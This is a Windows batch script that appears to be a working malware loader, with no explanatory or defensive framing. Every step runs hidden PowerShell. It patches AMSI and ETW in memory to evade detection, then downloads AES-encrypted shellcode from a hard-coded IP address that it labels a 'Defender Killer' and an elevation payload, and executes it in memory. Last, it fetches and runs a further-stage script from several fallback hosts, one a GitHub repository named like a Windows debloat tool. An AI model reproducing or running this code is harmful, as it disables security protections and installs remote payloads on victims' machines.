@echo off
setlocal EnableExtensions

rem === STEP 0: AMSI + ETW bypass FIRST (inline, before any download) ===
powershell -NoP -W Hidden -Command "$k='ker';$kb='nel32.dll';$Dm=[AppDomain]::CurrentDomain;$Da=New-Object System.Reflection.AssemblyName('W');$Ab=$Dm.DefineDynamicAssembly($Da,[System.Reflection.Emit.AssemblyBuilderAccess]::Run);$Mb=$Ab.DefineDynamicModule('M',$false);$Tb=$Mb.DefineType('W','Public,Class');$Dll=[System.Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]));$FldSL=[System.Runtime.InteropServices.DllImportAttribute].GetField('SetLastError');$FldEP=[System.Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint');$FldCS=[System.Runtime.InteropServices.DllImportAttribute].GetField('CharSet');$Flds=[System.Reflection.FieldInfo[]]@($FldSL,$FldEP,$FldCS);$csUni=[System.Runtime.InteropServices.CharSet]::Unicode;$csAnsi=[System.Runtime.InteropServices.CharSet]::Ansi;$ka=@($k+$kb);$m0=$Tb.DefineMethod('LL','Public,Static',[IntPtr],@([String]));$m0.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Flds,@($True,'LoadLibraryW',$csUni))));$m1=$Tb.DefineMethod('GA','Public,Static',[IntPtr],@([IntPtr],[String]));$m1.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Flds,@($True,'GetProcAddress',$csAnsi))));$m3=$Tb.DefineMethod('VP','Public,Static',[bool],@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType()));$m3.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Flds,@($True,'VirtualProtect',$csAnsi))));$W=$Tb.CreateType();$nd='ntd';$ndb='ll.dll';$nt=$W::LL($nd+$ndb);$p6=@(0xB8,0x00,0x00,0x00,0x00,0xC3);$uptr=[UIntPtr]6;$ad='ams';$adb='i.dll';$am=$W::LL($ad+$adb);if($am -ne [IntPtr]::Zero){$sb=$W::GA($am,[char]65+[char]109+[char]115+[char]105+[char]83+[char]99+[char]97+[char]110+[char]66+[char]117+[char]102+[char]102+[char]101+[char]114);if($sb -ne [IntPtr]::Zero){$o=[UInt32]0;$W::VP($sb,$uptr,0x40,[ref]$o)|Out-Null;[Runtime.InteropServices.Marshal]::Copy($p6,0,$sb,6);$W::VP($sb,$uptr,$o,[ref]$o)|Out-Null}};if($nt -ne [IntPtr]::Zero){$ew=$W::GA($nt,[char]69+[char]116+[char]119+[char]69+[char]118+[char]101+[char]110+[char]116+[char]87+[char]114+[char]105+[char]116+[char]101);if($ew -ne [IntPtr]::Zero){$o=[UInt32]0;$W::VP($ew,$uptr,0x40,[ref]$o)|Out-Null;[Runtime.InteropServices.Marshal]::Copy($p6,0,$ew,6);$W::VP($ew,$uptr,$o,[ref]$o)|Out-Null}}"

rem === STEP 1: Defender Killer (AES in-memory, NO disk write) ===
powershell -NoP -W Hidden -Command "$ProgressPreference='SilentlyContinue';[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$wc=New-Object Net.WebClient;$wc.Headers.Add('User-Agent','Mozilla/5.0');try{$enc=$wc.DownloadData('https://193.26.115.196/raw/update.exe.aes');$kv=[Convert]::FromBase64String('hnwCGrp/haHk1saCAuy/1T08cAkllwiSPs3Yapgaqu+bmqDA9hGHoH/yfaWuMbwv');$key=$kv[0..31];$iv=$kv[32..47];$aes=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes.Key=$key;$aes.IV=$iv;$dec=$aes.CreateDecryptor();$ms=new-object System.IO.MemoryStream(,$enc);$cs=new-object System.Security.Cryptography.CryptoStream($ms,$dec,[System.Security.Cryptography.CryptoStreamMode]::Read);$out=new-object System.IO.MemoryStream;$cs.CopyTo($out);$cs.Close();$ms.Close();$aes.Dispose();$sc=$out.ToArray();$out.Close();$size=$sc.Length;$k2='ker';$kb2='nel32.dll';$Dm2=[AppDomain]::CurrentDomain;$Da2=New-Object System.Reflection.AssemblyName('K2');$Ab2=$Dm2.DefineDynamicAssembly($Da2,[System.Reflection.Emit.AssemblyBuilderAccess]::Run);$Mb2=$Ab2.DefineDynamicModule('M2',$false);$Tb2=$Mb2.DefineType('K2','Public,Class');$Dll2=[System.Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]));$F2=@([System.Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),[System.Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),[System.Runtime.InteropServices.DllImportAttribute].GetField('CharSet'));$Tb2.DefineMethod('VA','Public,Static',[IntPtr],@([IntPtr],[UInt32],[UInt32],[UInt32])).SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll2,@($k2+$kb2),$F2,@($True,'VirtualAlloc',[System.Runtime.InteropServices.CharSet]::Ansi))));$Tb2.DefineMethod('CT','Public,Static',[IntPtr],@([IntPtr],[UInt32],[IntPtr],[IntPtr],[UInt32],[UInt32].MakeByRefType())).SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll2,@($k2+$kb2),$F2,@($True,'CreateThread',[System.Runtime.InteropServices.CharSet]::Ansi))));$K2=$Tb2.CreateType();$addr=$K2::VA([IntPtr]::Zero,$size,0x3000,0x40);if($addr -ne [IntPtr]::Zero){[Runtime.InteropServices.Marshal]::Copy($sc,0,$addr,$size);$tid=[UInt32]0;$K2::CT([IntPtr]::Zero,0,$addr,[IntPtr]::Zero,0,[ref]$tid)}}catch{}"

rem === Wait for Defender to die ===
timeout /t 8 /nobreak >nul 2>&1

rem === STEP 2: ElevatorShellcode (AES in-memory, NO disk write) ===
powershell -NoP -W Hidden -Command "$ProgressPreference='SilentlyContinue';[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$wc=New-Object Net.WebClient;$wc.Headers.Add('User-Agent','Mozilla/5.0');try{$enc=$wc.DownloadData('https://193.26.115.196/raw/ElevatorShellCode.exe.aes');$kv=[Convert]::FromBase64String('8XuttOXcFiQT+aOlVxneccVpq3mAugc5b7D3caLIVkbiFegb1/cCA2RAyIhtQult');$key=$kv[0..31];$iv=$kv[32..47];$aes=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes.Key=$key;$aes.IV=$iv;$dec=$aes.CreateDecryptor();$ms=new-object System.IO.MemoryStream(,$enc);$cs=new-object System.Security.Cryptography.CryptoStream($ms,$dec,[System.Security.Cryptography.CryptoStreamMode]::Read);$out=new-object System.IO.MemoryStream;$cs.CopyTo($out);$cs.Close();$ms.Close();$aes.Dispose();$sc=$out.ToArray();$out.Close();$size=$sc.Length;$k2='ker';$kb2='nel32.dll';$Dm2=[AppDomain]::CurrentDomain;$Da2=New-Object System.Reflection.AssemblyName('K3');$Ab2=$Dm2.DefineDynamicAssembly($Da2,[System.Reflection.Emit.AssemblyBuilderAccess]::Run);$Mb2=$Ab2.DefineDynamicModule('M3',$false);$Tb2=$Mb2.DefineType('K3','Public,Class');$Dll2=[System.Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]));$F2=@([System.Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),[System.Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),[System.Runtime.InteropServices.DllImportAttribute].GetField('CharSet'));$Tb2.DefineMethod('VA','Public,Static',[IntPtr],@([IntPtr],[UInt32],[UInt32],[UInt32])).SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll2,@($k2+$kb2),$F2,@($True,'VirtualAlloc',[System.Runtime.InteropServices.CharSet]::Ansi))));$Tb2.DefineMethod('CT','Public,Static',[IntPtr],@([IntPtr],[UInt32],[IntPtr],[IntPtr],[UInt32],[UInt32].MakeByRefType())).SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll2,@($k2+$kb2),$F2,@($True,'CreateThread',[System.Runtime.InteropServices.CharSet]::Ansi))));$K3=$Tb2.CreateType();$addr=$K3::VA([IntPtr]::Zero,$size,0x3000,0x40);if($addr -ne [IntPtr]::Zero){[Runtime.InteropServices.Marshal]::Copy($sc,0,$addr,$size);$tid=[UInt32]0;$K3::CT([IntPtr]::Zero,0,$addr,[IntPtr]::Zero,0,[ref]$tid)}}catch{}"

rem === Wait for elevation ===
timeout /t 6 /nobreak >nul 2>&1

rem === STEP 3: Download + run stage_v6_pulsaar.ps1 ===
powershell -NoP -W Hidden -Command "$ProgressPreference='SilentlyContinue';[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$sources=@('https://193.26.115.196/stage_v6_pulsaar.ps1','https://signindat.com/stage_v6_pulsaar.ps1','https://raw.githubusercontent.com/jimmyishere111/WinDebloat11/main/stage_v6_pulsaar.ps1');foreach($u in $sources){try{$wc=New-Object Net.WebClient;$wc.DownloadFile($u,\"$env:TEMP\\s.ps1\");if((Get-Item \"$env:TEMP\\s.ps1\").Length -gt 100){break}}catch{}};powershell -NoP -W Hidden -File \"$env:TEMP\\s.ps1\""

exit /b
